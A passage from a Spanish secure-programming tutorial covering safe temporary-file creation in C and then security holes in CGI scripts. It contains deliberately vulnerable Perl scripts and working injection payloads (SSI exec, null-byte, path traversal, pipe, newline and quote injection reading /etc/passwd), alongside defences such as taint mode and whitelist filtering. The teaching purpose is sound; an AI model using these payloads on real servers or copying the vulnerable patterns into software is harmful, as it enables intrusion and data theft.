manera, luego de la llamada umask(077) el archivo se abrirá en modo 600 (lectura/escritura
para el propietario, sin derechos para el resto de los usuarios).
Generalmente, la creación de archivos temporales se efectúa en tres etapas:
1. se crea un nombre único (al azar) ;
2. se abre el archivo usando O_CREAT | O_EXCL con una política de permisos lo más
restrictiva posible;
3. se verifica el resultado al abrir el archivo y se actúa en consecuencia (ya sea reintentar
o abandonar).
Detallemos ahora las posibilidades que existen para obtener un archivo temporal. Las funciones
#include <stdio.h>
char *tmpnam(char *s);
char *tempnam(const char *dir, const char *prefix);
devuelven punteros a nombres creados al azar.
La primera función admite un argumento NULL en cuyo caso devuelve la dirección de un
búfer estático. Su contenido cambiará en la siguiente llamada de tmpnam(NULL). Si el
argumento es una cadena asignada, el nombre se copia aquí lo que requiere de una cadena de
por lo menos L-tmpnam bytes. ¡Tengan cuidado con los desbordamientos de búfer! La página
del manual informa acerca de problemas cuando se usa esta función con el parámetro NULL si
se definen _POSIX_THREADS o _POSIX_THREAD_SAFE_FUNCTIONS.
La función tempnam() devuelve un puntero a una cadena. El directorio dir debe ser "apropiado"
(la página man describe el significado exacto de la palabra "apropiado"). Esta función verifica
que el archivo no exista antes de devolver su nombre. Sin embargo, una vez más la página del
manual (man) no recomienda su uso pues el término "apropiado" puede tener diferentes
significados según las implementaciones de la función. Mencionemos que Gnome recomienda
su uso de la siguiente manera :
char *filename;
int fd;
do {
filename = tempnam (NULL, "foo");
fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
free (filename);
} while (fd == -1);
El uso del bucle reduce algunos riesgos pero crea otros. Imaginen lo que sucedería si la
partición donde se desea crear el archivo temporal estuviese llena o si el sistema ya hubiera
abierto el número máximo de archivos disponible a la vez...
La función
#include <stdio.h>
FILE *tmpfile (void);
crea un único nombre de archivo y lo abre. Este archivo se borra automáticamente al cerrarlo.
En GlibC-2.1.3, esta función usa un mecanismo similar a tmpnam() para generar el nombre del
archivo y abrir el correspondiente descriptor. El archivo luego es eliminado, pero Linux
realmente no lo borrará sino hasta que ningún recurso lo utilice, es decir, cuando el descriptor
del archivo se libere a través de la llamada al sistema close().
FILE * fp_tmp;
if ((fp_tmp = tmpfile()) == NULL) {
fprintf (stderr, "No es posible crear un archivo temporal\n");
exit (EXIT_FAILURE);
}
/* ... uso del archivo temporal ... */
fclose (fp_tmp); /* verdadera eliminación del archivo por el sistema */
Los casos más sencillos no requieren del cambio del nombre del archivo ni la transmición a
otro proceso, sino únicamente del almacenamiento y de la relectura de datos en un área
temporal. Por lo tanto, generalmente no se necesita conocer el nombre del archivo temporal
sino sólo acceder a su contenido. La función tmpfile() hace precisamente esto.
La página del manual no desaconseja su uso pero sí lo hace el Secure-Programs-HOWTO.
Según el autor, las especificaciones no garantizan la creación del archivo y no ha podido
verificar cada implementación. A pesar de esta reserva, esta función es la más eficiente.
Por último, las funciones
#include <stdlib.h>
char *mktemp(char *template);
int mkstemp(char *template);
crean un único nombre desde una plantilla que consta de una cadena que termina con la cadena
"XXXXXX". Estas 'Xs' se reemplazan para obtener un nombre de archivo único.
Segun las distintas versiones, mktemp() reemplaza las primeras cinco 'X' con el ID del proceso
(PID) ...lo que hace fácil suponer el nombre ya que únicamente la última 'X' es aleatoria.
Algunas versiones permiten más de seis 'X'.
El Secure-Programs-HOWTO recomienda el uso de la función
mkstemp() Aquí está el método propuesto:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
void failure(msg) {
fprintf(stderr, "%s\n", msg);
exit(1);
}
/*
* Crea un archivo temporal y lo devuelve
* Esta rutina elimina el nombre del archivo del sistema de archivos
* con lo cual no volverá a aparecer al listar el contenido del directorio.
*/
FILE *create_tempfile(char *temp_filename_pattern)
{
int temp_fd;
mode_t old_mode;
FILE *temp_file;
/* Crea un archivo con permisos restrictivos */
old_mode = umask(077);
temp_fd = mkstemp(temp_filename_pattern);
(void) umask(old_mode);
if (temp_fd == -1) {
failure("No se pudo abrir el archivo temporal");
}
if (!(temp_file = fdopen(temp_fd, "w+b"))) {
failure("No se pudo crear el descriptor del archivo temporal");
}
if (unlink(temp_filename_pattern) == -1) {
failure("No se pudo eliminar el enlace al archivo temporal");
}
return temp_file;
}
Estas funciones muestran los problemas relacionados con la abstracción y portabilidad. Es
decir, se espera que las funciones de la biblioteca estándar proporcionen características
(abstracción)...pero la forma de implementarlas varía según el sistema empleado (portabilidad).
Por ejemplo, la función tmpfile() abre un archivo temporal de distintas maneras (algunas
versiones no usan O_EXCL) o mkstemp() maneja un número variable de 'X' de acuerdo a
determinadas implementaciones.
Conclusión
Hemos analizado la mayoría de los problemas de seguridad relacionados con los accesos
concurrentes a un mismo recurso. Tengamos presente que nunca se debe suponer que dos
operaciones consecutivas siempre se procesan en forma secuencial en la CPU a menos que el
kernel lo considere así. Si bien las condiciones de carrera generan agujeros de seguridad no se
deben despreciar los que se basan en otros recursos como las variables comunes entre
diferentes hebras o los segmentos de memoria compartidos por intermedio de los mecanismos
shmget(). Se deben implementar mecanismos de selección de accesos (mediante semáforos, por
ejemplo) para evitar fallas difíciles de diagnosticar.
PARTE V - Servidor Web, URI y problemas
de configuración
Introducción (demasiado breve) sobre como trabaja un
servidor web y como construir una URI
Cuando un cliente pide un archivo HTML, el servidor envía la página pedida (o un mensaje de
error). El navegador interpreta el código HTML para formatear y visualizar el fichero. Para
poner
un
ejemplo,
escribiendo
la
URL
(Uniform
Request
Locator)
http://www.linuxdoc.org/HOWTO/HOWTO-INDEX/howtos.html, el cliente se conecta al
servidor www.linuxdoc.org y pide la página /HOWTO/HOWTO-INDEX/howtos.html,
utilizando el protocolo HTTP. Si la página existe, el servidor envía el archivo pedido. Con este
modelo estático, si el archivo está presente en el servidor , éste es enviado "tal y como es" al
cliente, de otra forma un mensaje de error es enviado (el bien conocido 404 - Not Found).
Desgraciadamente, esto no permite la interactividad con el usuario. De este modo cosas
como e-negocios, e-reservas para vacaciones o e-loquesea no es posible.
Afortunadamente, hay soluciones para generar dinámicamente páginas HTML. Los scripts CGI
(Common Gateway Interface) son una de ellas. En este caso, la URL para acceder a estas
páginas es construida de forma ligeramente diferente:
http://<servidor><pathHaciaScript>[?[param_1=val_1][...][&param_n=val_n]]
La lista de argumentos es guardada en la variable de entorno QUERY_STRING. En este
contexto, un script CGI no es nada más que un archivo ejecutable. Utiliza stdin (standard input)
o la variable de entorno QUERY_STRING para obtener los argumentos que le pasan. Después
de ejecutar el código, el resultado es mostrado en stdout (standard output) y luego, redirigido al
cliente web. Casi todos los lenguajes de programación pueden ser usados para escribir un script
CGI (un programa compilado en C, Perl, shell-scripts...).
Por ejemplo, permítame buscar qué es lo que los HOWTOs de www.linuxdoc.org conocen
sobre ssh :
http://www.linuxdoc.org/cgi-bin/ldpsrch.cgi?
svr=http%3A%2F%2Fwww.linuxdoc.org&srch=ssh&db=1&scope=0&rpt=20
De hecho, esto es mucho más simple de lo que parece. Vamos a analizar esta URL :
●
●
●
el servidor es aún el mismo www.linuxdoc.org ;
el archivo pedido, el script CGI, es llamado /cgi-bin/ldpsrch.cgi ;
el carácter ? es el comienzo de una larga lista de argumentos :
1. srv=http%3A%2F%2Fwww.linuxdoc.org es el servidor de donde viene la
petición;
2. srch=ssh contiene la petición en sí;
3. db=1 significa que la petición solo se refiere a HOWTOs;
4. scope=0 significa que la petición se refiere al contenido del documento y no
solo a su título;
5. rpt=20 limita a 20 el número de respuestas visualizadas.
Frecuentemente, los nombres de los argumentos y sus valores son suficientemente
explícitos como para entender su significado. Además, el contenido de la página que
muestra las respuestas puede ser significativas.
Ahora sabemos que el lado brillante de los scripts CGI es la habilidad que tiene un usuario para
pasar argumentos... pero el lado oscuro es que un script mal programado abre un agujero de
seguridad.
Probablemente habrás notado caracteres extraños en tu navegador o presentes dentro de la
petición previa. Estos caracteres están en formato Unicode. La tabla 1 muestra el significado de
algunos de estos códigos. Permíteme mencionar que algunos servidores IIS4.0 y IIS5.0 tienen
una vulnerabilidad basada en estos caracteres.
Configuración de Apache con "SSI Server Side
Include"
Server Side Include es una función parte de los servidores web. Permite integrar instrucciones
dentro de las páginas web, incluir un fichero "tal y como es", o ejecutar un comando (shell o
script CGI).
En el fichero de configuración del Apache httpd.conf, la instrucción "AddHandler serverparsed .shtml" activa este mecanismo. Frecuentemente, para evitar la distinción entre .html and
.shtml, uno puede añadir la extensión .html. Evidentemente, esto ralentiza el servidor... Esto
puede ser controlado a nivel de directorios con las instrucciones:
●
●
Options Includes activa todos los SSI ;
OptionsIncludesNoExec prohibe exec cmd y exec cgi.
En el script adjunto LibroDeInvitados.cgi, el texto proporcionado por el usuario es incluido en
un archivo HTML, sin la conversión de caracteres de '<' y '>' hacia los códigos HTML < and
> . Suficiente para que una persona curiosa envie una de las siguientes instrucciones :
●
<!--#printenv --> (recuerda el espacio después de printenv )
●
<!--#exec cmd="cat /etc/passwd"-->
Con el primero,
LibroDeInvitados.cgi?email=pappy&texte=%3c%21--%23printenv%20--%3e
obtienes algunas líneas de información sobre el sistema :
DOCUMENT_ROOT=/home/web/sites/www8080
HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, image/png, */*
HTTP_ACCEPT_CHARSET=iso-8859-1,*,utf-8
HTTP_ACCEPT_ENCODING=gzip
HTTP_ACCEPT_LANGUAGE=en, fr
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.esiea.fr:8080
HTTP_PRAGMA=no-cache
HTTP_REFERER=http://www.esiea.fr:8080/~grenier/cgi/LibroDeInvitados.cgi?
email=&texte=%3C%21--%23include+file%3D%22LibroDeInvitados.cgi%22--%3E
HTTP_USER_AGENT=Mozilla/4.76 [fr] (X11; U; Linux 2.2.16 i686)
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR=194.57.201.103
REMOTE_HOST=nef.esiea.fr
REMOTE_PORT=3672
SCRIPT_FILENAME=/mnt/c/nef/grenier/public_html/cgi/LibroDeInvitados.html
SERVER_ADDR=194.57.201.103
SERVER_ADMIN=master8080@nef.esiea.fr
SERVER_NAME=www.esiea.fr
SERVER_PORT=8080
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.14 Server www.esiea.fr Port
8080</ADDRESS>
SERVER_SOFTWARE=Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/3.0.18
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/~grenier/cgi/LibroDeInvitados.html
SCRIPT_NAME=/~grenier/cgi/LibroDeInvitados.html
DATE_LOCAL=Tuesday, 27-Feb-2001 15:33:56 CET
DATE_GMT=Tuesday, 27-Feb-2001 14:33:56 GMT
LAST_MODIFIED=Tuesday, 27-Feb-2001 15:28:05 CET
DOCUMENT_URI=/~grenier/cgi/LibroDeInvitados.shtml
DOCUMENT_PATH_INFO=
USER_NAME=grenier
DOCUMENT_NAME=LibroDeInvitados.html
La instrucción exec, suministra casi lo mismo que una shell :
LibroDeInvitados.cgi?email=ppy&texte=%3c%21-%23exec%20cmd="cat%20/etc/passwd"%20--%3e
No intentes "<!--#include file="/etc/passwd"-->", el path es relativo al directorio donde puedes
encontrar el fichero HTML y no puede contener "..". El fichero de Apache error_log ,
contendrá un mensaje indicando un intento de acceso a un fichero prohibido . El usuario podrá
ver el mensaje [an error occurred while processing this directive] en la página HTML.
SSI no es necesario frecuentemente y es mejor desactivarlo del servidor. Sin embargo, la causa
del problema es la combinación entre la aplicación mal programada LibroDeInvitados y SSI.
Scripts en Perl
En esta sección, vamos a presentar los agujeros de seguridad relacionados con los scripts CGI
escritos en Perl. Para hacerlo mas claro, no daremos todo el código sino solamente las partes
requeridas para entender el problema.
Cada uno de nuestros scripts está programado siguiendo la plantilla siguiente :
#!/usr/bin/perl -wT
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)}; # Hacemos %ENV más segura =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD>";
print "<TITLE>Comando remoto</TITLE></HEAD>\n";
&ReadParse(\%input);
# Podemos usar $input por ejemplo así:
# print "<p>$input{archivo}</p>\n";
# ########################################## #
# Principio de la descripción del problema #
# ########################################## #
# #################################### #
# Fin de la descripción del problema #
# #################################### #
form:
print "<form action=\"$ENV{ÑOMBRE_DEL_SCRIPT'}\">\n";
print "<input type=texto name=archivo>\n </form>\n";
print "</BODY>\n";
print "</HTML>\n";
exit(0);
# el primer argumento tiene que ser una referencia a un hash
# El hash será rellenado con datos.
sub ReadParse($) {
my $in=shift;
my ($i, $key, $val);
my $in_primero;
my @in_segundo;
# Leer en texto
if ($ENV{'REQUEST_METHOD'} eq "GET") {
$in_first = $ENV{'QUERY_STRING'};
} elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
read(STDIN,$in_primero,$ENV{'CONTENT_LENGTH'});
}else{
die "ERROR: Método de petición desconocido\n";
}
@in_segundo = split(/&/,$in_primero);
foreach $i (0 .. $#in_segundo) {
# Convertir los caracteres + en espacios
$in_segundo[$i] =~ s/\+/ /g;
# Partir entre la clave y el valor.
($key, $val) = split(/=/,$in_segundo[$i],2);
# Convertir %XX de números hexadecimales a alfanuméricos
$key =~ s/%(..)/pack("c",hex($1))/ge;
$val =~ s/%(..)/pack("c",hex($1))/ge;
# Asociar una clave con un valor
# \0 es el separador múltiple
$$in{$key} .= "\0" if (defined($$in{$key}));
$$in{$key} .= $val;
}
return length($#in_segundo);
}
Después vamos a aprender más sobre los argumentos pasados al intérprete Perl (-wT).
Empezamos limpiando las variables de entorno $ENV y $PATH y enviamos seguidamente la
cabecera HTML (esto es parte del protocolo html implementado por el navegador cliente y el
servidor. Aunque no podamos verlo desde el lado del cliente). La función ReadParse() lee los
argumentos pasados al script. Esto puede hacerse más facilmente con módulos, pero así
podemos ver el código entero. Ahora vamos a presentar algunos ejemplos.
El byte null
Perl considera cada carácter de la misma forma, cosa que difiere de las funciones en C, por
ejemplo. En Perl, el carácter null al final de una cadena (string) es como cualquier otro. Qué
implica eso ?
Vamos a añadir el siguiente código a nuestro script para crear showhtml.cgi :
# showhtml.cgi
my $archivo= $input{archivo}.".html";
print "<BODY>Archivo : $archivo<BR>";
if (-e $archivo) {
open(FILE,"$archivo") || goto form;
print <FILE>;
}
La función ReadParse() obtiene el único argumento : el nombre del archivo a mostrar. Para
prevenir que se pueda leer algo más que ficheros HTML, añadimos la extensión ".html" al final
del nombre del fichero. Pero, recuerda, el carácter null es como cualquiera otro...
De este modo, si nuestra petición es showhtml.cgi?archivo=%2Fetc%2Fpasswd%00 el archivo
es llamado my $archivo = "/etc/passwd\0.html" y nuestros pasmados ojos estarán mirando algo
que no parece HTML.
Qué es lo que pasa ? El comando strace nos muestra como Perl abre un fichero:
/tmp >>cat >open.pl << EOF
> #!/usr/bin/perl
> open(FILE, "/etc/passwd\0.html");
> EOF
/tmp >>chmod 0700 open.pl
/tmp >>strace ./open.pl 2>&1 | grep open
execve("./open.pl", ["./open.pl"], [/* 24 vars */]) = 0
...
open("./open.pl", O_RDONLY)
=3
read(3, "#!/usr/bin/perl\n\nopen(FILE, \"/et"..., 4096) = 51
open("/etc/passwd", O_RDONLY)
=3
El último open() presentado por strace corresponde a la llamada de sistema escrita en C. Como
podemos ver la extensión .html ha desaparecido, y esto nos permite abrir /etc/passwd.
Este problema es solucionado con una expresión regular muy simple que borre todos los
caracteres null:
s/\0//g;
Utilizando pipes (tuberías)
Aquí tenemos un script sin protección alguna que muestra un archivo especificado del árbol de
directorios /home/httpd/ :
#pipe1.cgi
my $archivo= "/home/httpd/".$input{archivo};
print "<BODY>File : $archivo<BR>";
open(FILE,"$archivo") || goto form;
print <FILE>;
No vayais a reíros con este ejemplo! He visto cosas parecidas en muchos scripts.
El primer exploit es obvio :
pipe1.cgi?archivo=..%2F..%2F..%2Fetc%2Fpasswd
Suficiente para "subir" al árbol de directorios y acceder a cualquier fichero. Pero hay algo
mucho más interesante : ejecutar el comando que tú escojas. En Perl, el comando open(FILE,
"/bin/ls") abre el archivo binario "/bin/ls" ... pero open(FILE, "/bin/ls |") ejecuta dicho
comando. Añadiendo un simple pipe | cambia la conducta de open().
Otro problema viene del hecho que la existencia del archivo no es testeada, esto nos permite
ejecutar cualquier comando y además pasarle argumentos:
pipe1.cgi?archivo=..%2F..%2F..%2Fbin%2Fcat%20%2fetc%2fpasswd%20|
muestra el contenido del fichero de passwords.
Testeando la existencia del archivo da menos libertad a open :
#pipe2.cgi
my $archivo= "/home/httpd/".$input{archivo};
print "<BODY>File : $archivo<BR>";
if (-e $archivo) {
open(FILE,"$archivo") || goto form;
print <FILE>
} else {
print "-e fallado: el fichero no existe\n";
}
Aquí el ejemplo anterior ya no funciona. El test "-e" falla ya que no encuentra el archivo
"../../../bin/cat /etc/passwd |".
Vamos a probar el comando /bin/ls. Su conducta será la misma que antes. Eso es, si intentamos,
por ejemplo de listar el contenido del directorio /etc , "-e" testea la existencia del fichero
"../../../bin/ls /etc |", que no existe. Como no suministremos el nombre de un fichero "fantasma"
no vamos a obtener nada interesante :(
Sin embargo, aún hay alguna alternativa. El fichero /bin/ls existe (en la mayoría de los
sistemas) y pasaría el chequeo, pero si open() es llamado con este nombre de archivo se
mostraría el archivo binario, pero no se ejecutaría. Debemos buscar una solución para poner
una tubería (pipe) '|' al final del nombre, pero que no sea testeado con "-e". Ya conocemos la
solución : el byte null. Si enviamos "../../../bin/ls\0|" , el test de existencia pasa ya que solo
considera "../../../bin/ls", pero open() puede ver el pipe y luego ejecuta el comando. Así que la
URL que suministra el contenido del directorio actual es:
pipe2.cgi?archivo=../../../bin/ls%00|
Salto de línea
El script finger.cgi ejecuta la instrucción finger en nuestra máquina :
#finger.cgi
print "<BODY>";
$login = $input{'login'};
$login =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
$CMD= "/usr/bin/finger $login|";
open(FILE,"$CMD") || goto form;
print <FILE>
Este script utiliza, como mínimo, una protección útil: tiene en cuenta algunos caracteres
extraños para prevenir que sean interpretados por la shell poniendo un '\' delante. Así, el punto
y coma es cambiado a "\;" por la expresión regular. Pero la lista no contiene todos los
caracteres importantes. Entre otros, el salto de línea '\n'.
En tu shell preferida puedes validar una instrucción pulsando la tecla RETURN o ENTER , que
envía el carácter '\n'. En Perl, puedes hacer lo mismo. Ya hemos visto como la instrucción
open() nos permite ejecutar un comando cuando la línea termina con un pipe '|'.
Para simular este comportamiento es suficiente con añadir un salto de línea y una instrucción ,
después de enviar el login al comando finger :
finger.cgi?login=kmaster%0Acat%20/etc/passwd
Hay otros caracteres interesantes para ejecutar varias instrucciones en una sola línea:
●
●
; : acaba con la primera instrucción y va a ejecutar la próxima ;
&& : si la primera instrucción no falla (por ejemplo, devuelve un 0), la próxima va a
ser ejecutada;
● || : si la primera instrucción falla (por ejemplo, devuelve un valor no null), luego la
próxima es ejecutada.
Estos no funcionan aquí ya que el script está protegido de ellos gracias a la expresión regular.
Pero, vamos a buscar soluciones.
La barra invertida y el punto y coma
El script finger.cgi previo evita problemas con algunos caracteres extraños. Así, la URL
<finger.cgi?login=kmaster;cat%20/etc/passwd no resulta ya que el punto y coma es evitado.
Sin embargo, hay un carácter que no está protegido: la barra invertida '\'.
Imaginemos por un momento un script que evite la ascensión en el árbol de directorios
utilizando la expresión regular s/\.\.//g para desembarazarnos de "..". No importa! Las shells
pueden manejar varios '/' a la vez (simplemente prueba cat ///etc//////passwd para quedar
convencido).
Por ejemplo, en el script anterior pipe2.cgi, la variable $fichero es inicializada con el prefijo
"/home/httpd/". Parece que usando esta expresión regular sería suficiente para evitar la
ascensión en el árbol de directorios. Evidentemente, esta expresión protege a "..", pero qué pasa
si nosotros protegemos el carácter '.' ? Eso es, la expresión regular no concuerda si el nombre
del fichero es .\./.\./etc/passwd. En realidad, esta cadena funciona bien con la llamada system()
(o con ` ... `), pero falla con open() o el test "-e".
Vamos atrás con el script finger.cgi. Utilizando el punto y coma la URL
finger.cgi?login=kmaster;cat%20/etc/passwd no da el resultado esperado ya que el punto y
coma es filtrado por la expresión regular. Eso es, la shell recibe la instrucción:
/usr/bin/finger kmaster\;cat /etc/passwd
Los siguientes errores son encontrados en los logs del servidor web :
finger: kmaster;cat: no such user.
finger: /etc/passwd: no such user.
Estos mensajes son idénticos a los que obtendrías si lo escribieses en una shell. El problema
viene del hecho que la shell considera el carácter protegido ';' como parte de la cadena
"kmaster;cat" .
Necesitamos separar las dos instrucciones, la primera para el script y la siguiente que queremos
ejecutar. Debemos proteger ';' : <A HREF="finger.cgi?login=kmaster\;cat%20/etc/passwd">
finger.cgi?login=kmaster\;cat%20/etc/passwd</A>. La cadena "\; es cambiada en el script por
"\\;", y luego, enviada a la shell. Éste lee lo siguiente :
/usr/bin/finger kmaster\\;cat /etc/passwd
La shell divide la cadena en dos:
1. /usr/bin/finger kmaster\ que probablemente fallará... no sufras por eso ;-)
2. cat /etc/passwd que mostrará el fichero de passwords.
La solución es simple : el carácter barra invertida '\' también debe ser filtrado.
Utilizando un carácter " no protegido
A veces, el parámetro es "protegido" con comillas. Hemos cambiado ligeramente el script
previo finger.cgi para proteger la variable $login.
Sin embargo, si las comillas no son filtradas sera una consideración inútil. Suficiente con
añadir una en nuestra petición. Así, la primera comilla " enviada, cierra la abierta por el script.
Luego, escribes el comando, y la segunda comilla abriendo la última (que cerraría) del script.
El script finger2.cgi ilustra la idea :
#finger2.cgi
print "<BODY>";
$login = $input{'login'};
$login =~ s/\0//g;
$login =~ s/([<>\*\|`&\$!#\(\)\[\]\{\}:'\n])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
#Nueva (in)eficiente super protección :
$CMD= "/usr/bin/finger \"$login\"|";
open(FILE,"$CMD") || goto form;
while(<FILE>) {
print;
}
La URL que ejecutará el comando se convierte en :
finger2.cgi?login=kmaster%22%3Bcat%20%2Fetc%2Fpasswd%3B%22
La shell recibe el comando /usr/bin/finger "$login";cat /etc/passwd"" y las comillas ya no serán
un problema.
Recuerda que si quieres proteger los parámetros de tu script con comillas, debes filtrarlos igual
que la barra invertida o el punto y coma.
Programando en Perl
Opciones de Warning y tainting
Cuando programemos en Perl es aconsejable la opción w o "use warnings;" (Perl 5.6.0 y
siguientes) ya que nos informará sobre problemas potenciales como variables no inicializadas o
expresiones/funciones obsoletas.
La opción T (taint mode) proporciona mayor seguridad. Este modo activa varios tests. El más
importante concierne a una posible corrupción (tainting) de las variables. Las variables pueden
estar limpias o posiblemente corruptas. Los datos que provienen del exterior del programa son
considerados corruptos hasta que no hayan sido limpiadas. Las variables que pueden ser
corruptas no se pueden asignar a objetos que serán usados en el exterior del programa
(llamadas a otros comandos de la shell).
En taint mode, los argumentos de la línea de comandos, las variables de entorno, algunos
resultados de llamadas de sistema (readdir(), readlink(), readdir(), ...) y los datos que provienen
de archivos, son considerados sospechosos y por lo tanto son vigilados.
Para limpiar una variable debes pasarla a través de una expresión regular. Evidentemente,
utilizar .* es inútil. El objetivo es forzarte a tener en cuenta los argumentos proporcionados.
Debemos intentar utilizar siempre una expresión regular lo más específica posible.
No obstante, este modo no protege de todo: no se vigilan los argumentos pasados a system() o
exec() como una lista de variables. Debemos ser muy cuidadosos cuando uno de nuestros
scripts utilize estas funciones. Las instrucciones exec "sh", '-c', $arg; son consideradas como
seguras, esté como esté $arg :(
También es recomendado "use strict;" al principio de tus programas. Así forzamos la
obligación de declarar todas las variables; algunas personas pueden encontrarlo molesto pero es
obligatorio cuando utilizemos mod-perl.
De este modo, tus scripts en Perl deben empezar así :
#!/usr/bin/perl -wT
use strict;
use CGI;
con Perl 5.6.0 :
#!/usr/bin/perl -T
use warnings;
use strict;
use CGI;
La llamada open()
Muchos programadores abren un fichero simplemente utilizando open(FILE,"$fichero") || ....
Ya hemos visto los riesgos de este código. Para reducir este riesgo es suficiente con especificar
el modo para abrirlo:
●
●
open(FILE,"<$fichero") || ... para solo lectura;
open(FILE,">$fichero") || ... para solo escritura
En efecto, no abras tus ficheros de forma mal especificada.
Antes de acceder a un fichero es recomendable chequear si éste existe. Esto no evita las
condiciones de carrera presentadas en el artículo anterior, pero es útil respecto a algunos trucos
como comandos con sus argumentos.
if ( -e $fichero ) { ... }
Desde la versión de Perl 5.6, hay una nueva sintaxis para la llamada open() :
open(FILEHANDLE,MODO,LISTA). Con el modo '<' , el fichero se abre para lectura; con '>' ,
el fichero es truncado o creado si es necesario, y abierto para escritura. Hay un par de modos
muy interesantes para la comunicación con otros procesos. Si el modo es '|-' o '-|', el argumento
LISTA es interpretado como un comando y es respectivamente encontrado antes o después de
la tubería.
Antes de Perl 5.6 y open() con tres argumentos, algunas personas utilizaban el comando
sysopen().
Filtrando la entrada
Existen dos métodos : Podemos especificar los caracteres prohibidos, o definir explícitamente
los carecteres permitidos utilizando expresiones regulares. Los programas de ejemplo te habrán
convencido que es muy fácil olvidarse de filtrar caracteres que pueden ser potencialmente
peligrosos, es por esta razón que el segundo método es recomendado.
Prácticamente, lo que hacemos es lo siguiente : primero, chequeamos si la petición contiene
sólo caracteres permitidos. Luego, filtramos los caracteres considerados como peligrosos entre
los permitidos.
#!/usr/bin/perl -wT
# filtro.pl
#
#
#
#
#
Las variables $seguro y $peligroso definen respectivamente
los caracteres sin riesgo y los arriesgados.
Es suficiente con añadir/quitar algunos para cambiar el filtro.
Solamente la entrada $input que contenga los caracteres incluídos en
las definiciones es válida.
use strict;
my $input = shift;
my $seguro = '\w\d';
my $peligroso = '&`\'\\|"*?~<>^(){}\$\n\r\[\]';
#Note:
# '/', espacio y tab no son parte de las definiciones
if ($input =~ m/^[$seguro$peligroso]+$/g) {
$input =~ s/([$peligroso]+)/\\$1/g;
} else {
die "Hay caracteres no permitidos en la entrada $input\n";
}
print "input = [$input]\n";
Este script define dos conjuntos de caracteres :
●
●
$seguro contiene los caracteres no prohibidos (en este caso, sólo números y letras);
$peligroso contiene los caracteres permitidos, pero que pueden ser potencialmente
peligrosos; deberán ser filtrados.
Cualquier petición que contenga un caracter que no esté presente en uno de los dos conjuntos
deberá ser immediatamente descartado.
Ejercicio: El programa LibroDeInvitados.cgi defectuoso
#!/usr/bin/perl -w
# LibroDeInvitados.cgi
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)}; # Hacemos %ENV más seguro =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD><TITLE>Libro De Visitas Peligroso
</TITLE></HEAD>\n";
&ReadParse(\%input);
my $email= $input{email};
my $texto= $input{texto};
$texto =~ s/\n/<BR>/g;
print "<BODY><A HREF=\"LibroDeInvitados.html\">
GuestBook </A><BR><form
action=\"$ENV{'SCRIPT_NAME'}\">\n
Email: <input type=texto name=email><BR>\n
Texte:<BR>\n<textarea name=\"texto\" rows=15 cols=70>
</textarea><BR><input type=submit value=\"Adelante!\">
</form>\n";
print "</BODY>\n";
print "</HTML>";
open (FILE,">>LibroDeInvitados.html") || die ("No es posible la escritura\n");
print FILE "Email: $email<BR>\n";
print FILE "Texto: $texto<BR>\n";
print FILE "<HR>\n";
close(FILE);
exit(0);
sub ReadParse {
my $in =shift;
my ($i, $key, $val);
my $in_first;
my @in_second;
# Read in text
if ($ENV{'REQUEST_METHOD'} eq "GET") {
$in_first = $ENV{'QUERY_STRING'};
} elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
}else{
die "ERROR: Método de petición desconocido\n";
}
@in_second = split(/&/,$in_first);
foreach $i (0 .. $#in_second) {
# Convertir los + en espacios
$in_second[$i] =~ s/\+/ /g;
# Dividir entre la clave y el valor.
($key, $val) = split(/=/,$in_second[$i],2);
# Convertir los números hexadecimales %XX a alfanuméricos
$key =~ s/%(..)/pack("c",hex($1))/ge;
$val =~ s/%(..)/pack("c",hex($1))/ge;
# Asociar una clave con su valor.
$$in{$key} .= "\0" if (defined($$in{$key}));
$$in{$key} .= $val;
}
return length($#in_second);
}
Scripts PHP
No querría ser polémico pero creo que es mejor escribir scripts en PHP que no en Perl. Más
exactamente, como administrador de sistemas, prefiero que mis usuarios escriban scripts con
lenguaje PHP que no en Perl. Cualquiera que programe mal - o de forma insegura - en PHP
puede dejar un agujero de seguridad igual de peligroso que en Perl. Si es así, porqué prefiero
PHP? Pués porqué en este lenguaje puedes activar un Modo Seguro (Safe mode) cuando haya
problemas de programación (safe_mode=on) o desactivar funciones peligrosas
(disable_functions=...). Este modo impide acceder a ficheros que no sean propiedad del
usuario, o cambiar variables de entorno sin que esté explícitamente permitido, ejecutar
comandos, etc.
Por defecto el banner de Apache nos informa sobre la versión de PHP que estamos usando.
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2001 11:22:41 GMT
Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
Connection: close
Content-Type: text/html
Connection closed by foreign host.
Suficiente con escribir expose_PHP = Off en /etc/php.ini para esconder dicha información :
Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a mod_perl/1.24
El fichero /etc/php.ini (PHP4) o /etc/httpd/php3.ini tiene muchos parámetros que permiten
hacer el sistema más robusto. Por ejemplo, la opción "magic_quotes_gpc" añade unas comillas
en los argumentos recibidos por los métodos GET, POST y vía cookies; esto soluciona algunos
problemas de seguridad que nos hemos encontrado con Perl.
Conclusión
